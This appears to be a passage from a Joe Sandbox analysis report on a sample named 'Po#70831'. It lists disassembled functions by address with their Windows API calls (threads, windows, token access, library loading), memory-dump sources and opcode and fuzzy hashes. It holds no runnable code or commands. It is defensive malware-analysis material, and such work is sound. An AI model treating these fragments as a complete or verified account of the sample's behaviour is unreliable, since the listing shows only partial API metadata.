                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend_wcslen
                                      • String ID:
                                      • API String ID: 455545452-0
                                      • Opcode ID: 1e2e84bd60857079242564a7115076197f09459c6fb376455995356926e58ff3
                                      • Instruction ID: 968978bd3243d4d84286dcdec2f5430c06a94b3e1183f600b7646f6e61e4e8d2
                                      • Opcode Fuzzy Hash: 1e2e84bd60857079242564a7115076197f09459c6fb376455995356926e58ff3
                                      • Instruction Fuzzy Hash: BE11E17160062896DF209F65ACC5AEE7FACFF52364B10442AF915D60C1F7B0DA84CBA4
                                      Function 004F1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004F1A47
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004F1A59
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004F1A6F
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004F1A8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 7956ae84b6e03413600c436d2047da6a2dbc55f874165cfbe596ec95fab1d173
                                      • Instruction ID: 9d29ca306c79ee02a3e8fa5defa6132ddfd694d5edd8383a058eb5d6cfda751e
                                      • Opcode Fuzzy Hash: 7956ae84b6e03413600c436d2047da6a2dbc55f874165cfbe596ec95fab1d173
                                      • Instruction Fuzzy Hash: 06110C3AD01219FFEB11DBA5CD85FADBB78EB04750F200096E604B7290D6716E51DB94
                                      Function 004FE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 004FE1FD
                                      • MessageBoxW.USER32(?,?,?,?), ref: 004FE230
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004FE246
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004FE24D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                      • String ID:
                                      • API String ID: 2880819207-0
                                      • Opcode ID: 7ea20fe0525473397df9a57341cfbe58119ff8454fe80fe067a8165e652fff1f
                                      • Instruction ID: 3fbe72f87d507d034c1e09da94c575e329cb3f97d18017c93df3302733839dee
                                      • Opcode Fuzzy Hash: 7ea20fe0525473397df9a57341cfbe58119ff8454fe80fe067a8165e652fff1f
                                      • Instruction Fuzzy Hash: CD114872A04208BBD7109BAD9C05AAF3FACEF51321F144A5AF916D3391E2B4890887A4
                                      Function 004BD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,?,004BCFF9,00000000,00000004,00000000), ref: 004BD218
                                      • GetLastError.KERNEL32 ref: 004BD224
                                      • __dosmaperr.LIBCMT ref: 004BD22B
                                      • ResumeThread.KERNEL32(00000000), ref: 004BD249
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                      • String ID:
                                      • API String ID: 173952441-0
                                      • Opcode ID: 7542382286a81ced900b57daffa2070540ef2ff84de1ceb7a74bbe684f5584bb
                                      • Instruction ID: d96d0a52de5bf646db9998ae3f74fec8106614e294dda03b61831868a1602671
                                      • Opcode Fuzzy Hash: 7542382286a81ced900b57daffa2070540ef2ff84de1ceb7a74bbe684f5584bb
                                      • Instruction Fuzzy Hash: 13012636C052047BCB245BAADC05BEF7E68DF82334F2002DAF924921D0EB758806D7B5
                                      Function 0049600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0049604C
                                      • GetStockObject.GDI32(00000011), ref: 00496060
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0049606A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateMessageObjectSendStockWindow
                                      • String ID:
                                      • API String ID: 3970641297-0
                                      • Opcode ID: aa4e543b0d3c6a4875e5c3750865d76a6efce44be2eca80b8ab028ce2d296847
                                      • Instruction ID: 09657dffd36053eaa9b87a06f7b3269c17410f7fbe3c1a1e08b22bc930b8b0e4
                                      • Opcode Fuzzy Hash: aa4e543b0d3c6a4875e5c3750865d76a6efce44be2eca80b8ab028ce2d296847
                                      • Instruction Fuzzy Hash: 8C11AD72501508BFEF228FA48C94EEBBF69EF593A4F050226FA0552110C7369C61EBA5
                                      Function 004B3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004B3B56
                                        • Part of subcall function 004B3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 004B3AD2
                                        • Part of subcall function 004B3AA3: ___AdjustPointer.LIBCMT ref: 004B3AED
                                      • _UnwindNestedFrames.LIBCMT ref: 004B3B6B
                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004B3B7C
                                      • CallCatchBlock.LIBVCRUNTIME ref: 004B3BA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                      • String ID:
                                      • API String ID: 737400349-0
                                      • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                      • Instruction ID: 28a3adb5103d9beb580eb3ab44a430edab40c99a21236ce3fd47c7ae42cdcc10
                                      • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                      • Instruction Fuzzy Hash: 12012D32100148BBDF116E96CC42DEB7B69EF98759F04401AFE4856122C73AE961DBB4
                                      Function 004C3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004913C6,00000000,00000000,?,004C301A,004913C6,00000000,00000000,00000000,?,004C328B,00000006,FlsSetValue), ref: 004C30A5
                                      • GetLastError.KERNEL32(?,004C301A,004913C6,00000000,00000000,00000000,?,004C328B,00000006,FlsSetValue,00532290,FlsSetValue,00000000,00000364,?,004C2E46), ref: 004C30B1
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004C301A,004913C6,00000000,00000000,00000000,?,004C328B,00000006,FlsSetValue,00532290,FlsSetValue,00000000), ref: 004C30BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: c2c48c03d991ac98fd4608bfd892a9b301c1da570e5e6479319965b323511334
                                      • Instruction ID: c90cd6104fc710b0ac006cc702eb093ac78ca4ca36a00540ef982b2d4b40cec8
                                      • Opcode Fuzzy Hash: c2c48c03d991ac98fd4608bfd892a9b301c1da570e5e6479319965b323511334
                                      • Instruction Fuzzy Hash: E401703B301622EBC7704F7AAC44F677B98AF15B72B108629F946D3240C725DD06C6E4
                                      Function 004F7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 004F747F
                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004F7497
                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004F74AC
                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004F74CA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Type$Register$FileLoadModuleNameUser
                                      • String ID:
                                      • API String ID: 1352324309-0
                                      • Opcode ID: 6bee9fa1139b2ca5168d49ace75e3ae1b2fe95209372279b1a74aa167be82e73
                                      • Instruction ID: c9d7f4a558e8afd04021f8c91ae85685b9cb37ea9fff90edd011932c9d30a72a
                                      • Opcode Fuzzy Hash: 6bee9fa1139b2ca5168d49ace75e3ae1b2fe95209372279b1a74aa167be82e73
                                      • Instruction Fuzzy Hash: 40118EB1205319ABE7309F14ED09BA67FFCEF00B00F10856AE616D7192D778E909DB95
                                      Function 004FB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004FACD3,?,00008000), ref: 004FB0C4
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004FACD3,?,00008000), ref: 004FB0E9
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,004FACD3,?,00008000), ref: 004FB0F3
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,004FACD3,?,00008000), ref: 004FB126
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: 5b2b1e701833d471b195ea34bd5bc6f3ff8c95bd78893fb00da2a58a5099ac50
                                      • Instruction ID: b5ee56ba00f0828eeb1c6e71934d6235e4a7735eb2018772ff524535d952f1af
                                      • Opcode Fuzzy Hash: 5b2b1e701833d471b195ea34bd5bc6f3ff8c95bd78893fb00da2a58a5099ac50
                                      • Instruction Fuzzy Hash: 49115A30C0091CDBCF109FA4DA696FEBF78FF5A311F004086DA41B2241CB344555DB99
                                      Function 004F2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004F2DC5
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 004F2DD6
                                      • GetCurrentThreadId.KERNEL32 ref: 004F2DDD
                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 004F2DE4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: bfae7bad266b2e1fdaf1bb534f51cc0bc5f751e2f3c1c47b26a8829a59b552ee
                                      • Instruction ID: d38def19d3f468a8b5bbab0e1c1fec8da705e9fdd8c452f1c4f51def171b9482
                                      • Opcode Fuzzy Hash: bfae7bad266b2e1fdaf1bb534f51cc0bc5f751e2f3c1c47b26a8829a59b552ee
                                      • Instruction Fuzzy Hash: 06E06D711016287BE7301B669C0EEFB7E6CEF63BA1F400116B205D10819AA8984AD6B0
                                      Function 00528863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004A9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A9693
                                        • Part of subcall function 004A9639: SelectObject.GDI32(?,00000000), ref: 004A96A2
                                        • Part of subcall function 004A9639: BeginPath.GDI32(?), ref: 004A96B9
                                        • Part of subcall function 004A9639: SelectObject.GDI32(?,00000000), ref: 004A96E2
                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00528887
                                      • LineTo.GDI32(?,?,?), ref: 00528894
                                      • EndPath.GDI32(?), ref: 005288A4
                                      • StrokePath.GDI32(?), ref: 005288B2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: 123abff06eeb7767b8fc23ef40f25a3c5d2336f2722d73e0a06ac913cf5c313b
                                      • Instruction ID: 48b03a200594d0017a3b86d3a0a2c70cdc75e4352a6fd32a8693be77cf439a92
                                      • Opcode Fuzzy Hash: 123abff06eeb7767b8fc23ef40f25a3c5d2336f2722d73e0a06ac913cf5c313b
                                      • Instruction Fuzzy Hash: A0F05436041554F6EB225F94AC0DFDE3F596F27310F048000FA11650E2C7B55556EFE9
                                      Function 004A98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 004A98CC
                                      • SetTextColor.GDI32(?,?), ref: 004A98D6
                                      • SetBkMode.GDI32(?,00000001), ref: 004A98E9
                                      • GetStockObject.GDI32(00000005), ref: 004A98F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Color$ModeObjectStockText
                                      • String ID:
                                      • API String ID: 4037423528-0
                                      • Opcode ID: 670a5dca53e69c8c850f0cca0d098345895953437e943176e2cc60ec2cbf04cf
                                      • Instruction ID: bf78e122b587e51ae4b4bcd06ee56e9ad4ebcb80369262d608d97ff00a3ab4bd
                                      • Opcode Fuzzy Hash: 670a5dca53e69c8c850f0cca0d098345895953437e943176e2cc60ec2cbf04cf
                                      • Instruction Fuzzy Hash: C2E06531244680BADB315B75AC09BDD3F10AF23336F04821AF6F6541E2C3754655EB11
                                      Function 004F162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 004F1634
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,004F11D9), ref: 004F163B
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004F11D9), ref: 004F1648
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,004F11D9), ref: 004F164F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: b3cb229c62f015f2adcc824b7c0ff0fec747290d05ebd8a07f4fe1483bd5fde2
                                      • Instruction ID: 4fedcb9c7f5ca280a96236ee101fd36c2c8c96a3f51cdb0035467c88f5382c66
                                      • Opcode Fuzzy Hash: b3cb229c62f015f2adcc824b7c0ff0fec747290d05ebd8a07f4fe1483bd5fde2
                                      • Instruction Fuzzy Hash: B4E08631601211DBE7301FA09D0DB5F3F7CAF76791F144809F346CA091D638444AD758
                                      Function 004ED858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 004ED858
                                      • GetDC.USER32(00000000), ref: 004ED862
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 004ED882
                                      • ReleaseDC.USER32(?), ref: 004ED8A3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CapsDesktopDeviceReleaseWindow
                                      • String ID:
                                      • API String ID: 2889604237-0
                                      • Opcode ID: a8dd197ad3de89f9200a4bf3e458cceaf984610108ca91fd4f79b3ef792c8315
                                      • Instruction ID: dd41dc114b918b46fadd0758f817628ea29e3d6b2f50f21ee57b734cc4379887
                                      • Opcode Fuzzy Hash: a8dd197ad3de89f9200a4bf3e458cceaf984610108ca91fd4f79b3ef792c8315
                                      • Instruction Fuzzy Hash: 0AE0E5B5C00204DFCB51AFA5980866DBFB1FF19711F10801AE806E7251C7385906AF45
                                      Function 004ED86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
